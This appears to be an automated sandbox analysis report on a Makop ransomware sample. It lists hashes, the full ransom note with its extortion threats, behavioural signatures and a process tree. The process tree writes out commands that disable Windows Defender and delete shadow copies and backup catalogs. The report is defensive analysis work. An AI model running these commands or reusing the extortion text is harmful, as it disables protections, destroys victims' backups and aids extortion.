Analysis

  • max time kernel
    148s
  • max time network
    123s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    26-12-2021 05:07

General

  • Target

    c540c9b5b467d575f46433b78237f6e1.exe

  • Size

    109KB

  • MD5

    c540c9b5b467d575f46433b78237f6e1

  • SHA1

    93dd622dc1268f598a47fe7c75efbce355097b98

  • SHA256

    5f5d1f324ed8dc18d76f200a176d40ab2ae48e336f33c2f7b5d047d682f3260a

  • SHA512

    29776896e4e5eef318389c3b618afe1a1ccb83e4eb41c42bcb108576a50953d760696bcf7531331678e00284a2d0320dba553070a2e0cc3bd7896802e82c9190

Malware Config

Extracted

Path

C:\Windows\tasks\readme-warning.txt

Ransom Note
All of your files have been encrypted. Your backup files as well. We have exfiltrated tons of your private data to our servers including data of your clients, dont believe us ? Read on. In order to restore your operations, avoid leaking/selling your data, and keep your business reputation intact, contact us directly on the below TOX ID as soon as possible. 1) TOX Download: https://tox.chat/ 2) TOX ID: 5D935FD670BAEF3EA1938D60B91709D421DE8E21381267A77E16ED0D5FB4E36334304E35A472 3) Install TOX and add the TOX ID in the step 2 4) Share your personal ID over TOX chat (Do not send hello without your personal ID provided below) Upon contacting us, proof will be provided that we can decrypt your data, and samples of exfiltrated confidential information will also be provided. Although its not our intention , if you do not cooperate , we will not hesitate to make your data public including any confidential data , sell to your competitors/bidders , or send your clients their data just to make you look really bad and lose your clients trust , or even worse , being prosecuted for not telling your affected clients that their data has been compromised. Talking to law enforcement will only ensure that you don't get a decryption key and put your business reputation on the line. Attention! - Do not rename encrypted files. - Do not try to decrypt your data using third party software, it may cause permanent data loss. Your personal ID: 6A239AB5
URLs

https://tox.chat/

Signatures

  • MAKOP ransomware payload 3 IoCs
  • Makop

    Ransomware family discovered by @VK_Intel in early 2020.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c540c9b5b467d575f46433b78237f6e1.exe
    "C:\Users\Admin\AppData\Local\Temp\c540c9b5b467d575f46433b78237f6e1.exe"
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3824
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /C cmd /c reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f & reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring $true" & dism /online /disable-feature /featurename:windows-defender /remove /norestart /quiet & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Add-MpPreference -ExclusionPath C:\ -ErrorAction SilentlyContinue"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4324
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3920
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          4⤵
            PID:4484
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
          3⤵
            PID:4520
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring $true"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3212
          • C:\Windows\SysWOW64\Dism.exe
            dism /online /disable-feature /featurename:windows-defender /remove /norestart /quiet
            3⤵
            • Drops file in Windows directory
            PID:2976
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4912
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2052
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3748
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4828
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4696
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3128
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4300
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3056
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2320
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4196
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Add-MpPreference -ExclusionPath C:\ -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:712
        • C:\Windows\SysWOW64\cmd.exe
          "cmd" /C timeout 10
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4880
          • C:\Windows\SysWOW64\timeout.exe
            timeout 10
            3⤵
            • Delays execution with timeout.exe
            PID:4564
        • C:\Windows\tasks\MpResult.exe
          "C:\Windows\tasks\MpResult.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2260
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
            3⤵
              PID:4072
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /C timeout 30
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:748
            • C:\Windows\SysWOW64\timeout.exe
              timeout 30
              3⤵
              • Delays execution with timeout.exe
              PID:4148
          • C:\Windows\tasks\SA.exe
            "C:\Windows\tasks\SA.exe"
            2⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            PID:2796
            • C:\Windows\tasks\SA.exe
              "C:\Windows\tasks\SA.exe" n2796
              3⤵
              • Executes dropped EXE
              PID:4748
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe"
              3⤵
                PID:4528
                • C:\Windows\system32\vssadmin.exe
                  vssadmin delete shadows /all /quiet
                  4⤵
                  • Interacts with shadow copies
                  PID:4660
                • C:\Windows\system32\wbadmin.exe
                  wbadmin delete catalog -quiet
                  4⤵
                  • Deletes backup catalog
                  PID:4172
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic shadowcopy delete
                  4⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3560
            • C:\Windows\SysWOW64\msiexec.exe
              "C:\Windows\System32\msiexec.exe" /i "C:\Windows\tasks\0.msi"
              2⤵
              • Enumerates connected drives
              • Suspicious use of FindShellTrayWindow
              PID:1580
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2304
          • C:\Windows\system32\wbengine.exe
            "C:\Windows\system32\wbengine.exe"
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3960
          • C:\Windows\System32\vdsldr.exe
            C:\Windows\System32\vdsldr.exe -Embedding
            1⤵
              PID:220
            • C:\Windows\System32\vds.exe
              C:\Windows\System32\vds.exe
              1⤵
              • Checks SCSI registry key(s)
              PID:3848
            • C:\Windows\system32\msiexec.exe
              C:\Windows\system32\msiexec.exe /V
              1⤵
              • Enumerates connected drives
              PID:608
              • C:\Windows\syswow64\MsiExec.exe
                C:\Windows\syswow64\MsiExec.exe -Embedding 1E0DB3E7069B9D0B6719E8813D6F2CF2 C
                2⤵
                • Loads dropped DLL
                PID:4196
                • C:\Windows\SysWOW64\rundll32.exe
                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI233E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259466281 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                  3⤵
                  • Loads dropped DLL
                  PID:2532

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/3212-146-0x0000000007160000-0x000000000717C000-memory.dmp

              Filesize

              112KB

            • memory/3212-140-0x0000000006E60000-0x0000000006E82000-memory.dmp

              Filesize

              136KB

            • memory/3212-163-0x00000000070A0000-0x0000000007106000-memory.dmp

              Filesize

              408KB

            • memory/3212-164-0x00000000072B0000-0x00000000072FB000-memory.dmp

              Filesize

              300KB

            • memory/3212-165-0x0000000008060000-0x00000000080D6000-memory.dmp

              Filesize

              472KB

            • memory/3212-166-0x0000000008E90000-0x0000000008EAE000-memory.dmp

              Filesize

              120KB

            • memory/3212-171-0x00000000091E0000-0x0000000009285000-memory.dmp

              Filesize

              660KB

            • memory/3212-172-0x0000000009420000-0x00000000094B4000-memory.dmp

              Filesize

              592KB

            • memory/3212-241-0x00000000049A3000-0x00000000049A4000-memory.dmp

              Filesize

              4KB

            • memory/3212-366-0x0000000009380000-0x000000000939A000-memory.dmp

              Filesize

              104KB

            • memory/3212-371-0x0000000009380000-0x000000000939A000-memory.dmp

              Filesize

              104KB

            • memory/3212-372-0x0000000009360000-0x0000000009368000-memory.dmp

              Filesize

              32KB

            • memory/3212-377-0x0000000009360000-0x0000000009368000-memory.dmp

              Filesize

              32KB

            • memory/3212-161-0x000000007F310000-0x000000007F311000-memory.dmp

              Filesize

              4KB

            • memory/3212-138-0x0000000000CA0000-0x0000000000CD6000-memory.dmp

              Filesize

              216KB

            • memory/3212-162-0x0000000006F00000-0x0000000006F66000-memory.dmp

              Filesize

              408KB

            • memory/3212-139-0x0000000007360000-0x0000000007988000-memory.dmp

              Filesize

              6.2MB

            • memory/3212-160-0x0000000006E60000-0x0000000006E82000-memory.dmp

              Filesize

              136KB

            • memory/3212-141-0x0000000006F00000-0x0000000006F66000-memory.dmp

              Filesize

              408KB

            • memory/3212-142-0x00000000070A0000-0x0000000007106000-memory.dmp

              Filesize

              408KB

            • memory/3212-143-0x00000000049A0000-0x00000000049A1000-memory.dmp

              Filesize

              4KB

            • memory/3212-144-0x00000000049A2000-0x00000000049A3000-memory.dmp

              Filesize

              4KB

            • memory/3212-145-0x0000000007A90000-0x0000000007DE0000-memory.dmp

              Filesize

              3.3MB

            • memory/3212-137-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

              Filesize

              4KB

            • memory/3212-159-0x0000000008EB0000-0x0000000008EE3000-memory.dmp

              Filesize

              204KB

            • memory/3212-136-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

              Filesize

              4KB

            • memory/3212-147-0x00000000072B0000-0x00000000072FB000-memory.dmp

              Filesize

              300KB

            • memory/3212-148-0x0000000008060000-0x00000000080D6000-memory.dmp

              Filesize

              472KB

            • memory/3212-158-0x0000000008EB0000-0x0000000008EE3000-memory.dmp

              Filesize

              204KB

            • memory/3212-149-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

              Filesize

              4KB

            • memory/3212-157-0x0000000007360000-0x0000000007988000-memory.dmp

              Filesize

              6.2MB

            • memory/3824-116-0x0000000000120000-0x0000000000140000-memory.dmp

              Filesize

              128KB

            • memory/3824-122-0x00000000049C0000-0x0000000004A0B000-memory.dmp

              Filesize

              300KB

            • memory/3824-117-0x0000000004F10000-0x0000000005516000-memory.dmp

              Filesize

              6.0MB

            • memory/3824-130-0x0000000006210000-0x0000000006260000-memory.dmp

              Filesize

              320KB

            • memory/3824-129-0x0000000007680000-0x0000000007BAC000-memory.dmp

              Filesize

              5.2MB

            • memory/3824-128-0x0000000006F80000-0x0000000007142000-memory.dmp

              Filesize

              1.8MB

            • memory/3824-118-0x0000000004920000-0x0000000004932000-memory.dmp

              Filesize

              72KB

            • memory/3824-127-0x0000000005590000-0x00000000055F6000-memory.dmp

              Filesize

              408KB

            • memory/3824-119-0x0000000004A50000-0x0000000004B5A000-memory.dmp

              Filesize

              1.0MB

            • memory/3824-120-0x0000000004980000-0x00000000049BE000-memory.dmp

              Filesize

              248KB

            • memory/3824-126-0x0000000004DB0000-0x0000000004DCE000-memory.dmp

              Filesize

              120KB

            • memory/3824-125-0x0000000005A20000-0x0000000005F1E000-memory.dmp

              Filesize

              5.0MB

            • memory/3824-124-0x0000000004E10000-0x0000000004EA2000-memory.dmp

              Filesize

              584KB

            • memory/3824-115-0x0000000000120000-0x0000000000140000-memory.dmp

              Filesize

              128KB

            • memory/3824-123-0x0000000004CF0000-0x0000000004D66000-memory.dmp

              Filesize

              472KB

            • memory/3824-121-0x0000000004900000-0x0000000004F06000-memory.dmp

              Filesize

              6.0MB

            • memory/4912-414-0x0000000009410000-0x0000000009443000-memory.dmp

              Filesize

              204KB

            • memory/4912-401-0x0000000008220000-0x000000000823C000-memory.dmp

              Filesize

              112KB

            • memory/4912-416-0x0000000007CF0000-0x0000000007D56000-memory.dmp

              Filesize

              408KB

            • memory/4912-418-0x0000000008770000-0x00000000087BB000-memory.dmp

              Filesize

              300KB

            • memory/4912-419-0x0000000008550000-0x00000000085C6000-memory.dmp

              Filesize

              472KB

            • memory/4912-415-0x0000000007A50000-0x0000000007A72000-memory.dmp

              Filesize

              136KB

            • memory/4912-413-0x0000000009410000-0x0000000009443000-memory.dmp

              Filesize

              204KB

            • memory/4912-420-0x00000000093F0000-0x000000000940E000-memory.dmp

              Filesize

              120KB

            • memory/4912-412-0x00000000073F0000-0x0000000007A18000-memory.dmp

              Filesize

              6.2MB

            • memory/4912-403-0x0000000008550000-0x00000000085C6000-memory.dmp

              Filesize

              472KB

            • memory/4912-402-0x0000000008770000-0x00000000087BB000-memory.dmp

              Filesize

              300KB

            • memory/4912-417-0x0000000007AF0000-0x0000000007B56000-memory.dmp

              Filesize

              408KB

            • memory/4912-399-0x0000000006DB2000-0x0000000006DB3000-memory.dmp

              Filesize

              4KB

            • memory/4912-398-0x0000000006DB0000-0x0000000006DB1000-memory.dmp

              Filesize

              4KB

            • memory/4912-397-0x0000000007DD0000-0x0000000008120000-memory.dmp

              Filesize

              3.3MB

            • memory/4912-396-0x0000000007AF0000-0x0000000007B56000-memory.dmp

              Filesize

              408KB

            • memory/4912-395-0x0000000007CF0000-0x0000000007D56000-memory.dmp

              Filesize

              408KB

            • memory/4912-394-0x0000000007A50000-0x0000000007A72000-memory.dmp

              Filesize

              136KB

            • memory/4912-393-0x00000000073F0000-0x0000000007A18000-memory.dmp

              Filesize

              6.2MB

            • memory/4912-392-0x0000000006D20000-0x0000000006D56000-memory.dmp

              Filesize

              216KB